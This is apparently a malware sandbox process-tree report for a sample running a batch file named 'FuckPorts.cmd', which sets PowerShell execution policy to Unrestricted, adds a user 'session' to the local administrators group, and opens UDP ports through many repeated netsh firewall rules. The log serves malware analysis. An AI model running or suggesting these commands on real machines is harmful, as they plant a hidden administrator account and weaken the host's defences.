- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:4684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:1160
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3364
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1996
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:656
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3404
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4336
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5100
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3212
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1760
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4140
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3768
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:5080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3324
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:3788
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2136
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:572
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4848
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1420
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2280
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3496
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2868
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2332
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:4476
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:900
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:260
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:2540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:228
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2632
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3788
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2476
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4112
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2964
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:128
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3196
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1984
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2152
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:916
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4400
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3196
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2396
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1516
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3324
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2200
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1664
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:1068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4420
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4672
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2368
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3132
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1548
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3312
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:1168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1824
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1528
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4196
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4980
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:228
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:1668
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4752
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1612
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2256
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4404
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4400
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1476
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4860
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4868
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3900
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1388
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2380
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3624
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4196
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1464
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1124
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1668
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4200
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2332
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:3588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2260
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:1732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3368
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:1108
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3184
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4176
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2292
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2460
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2380
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3236
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3104
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4652
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3164
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1388
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2680
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1144
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:4264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4652
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1328
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4276
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4852
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4660
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4268
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:2720
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4432
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4996
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4196
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4672
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2660
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2952
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3324
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4644
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3124
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3148
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4980
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3572
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:4884
-
-
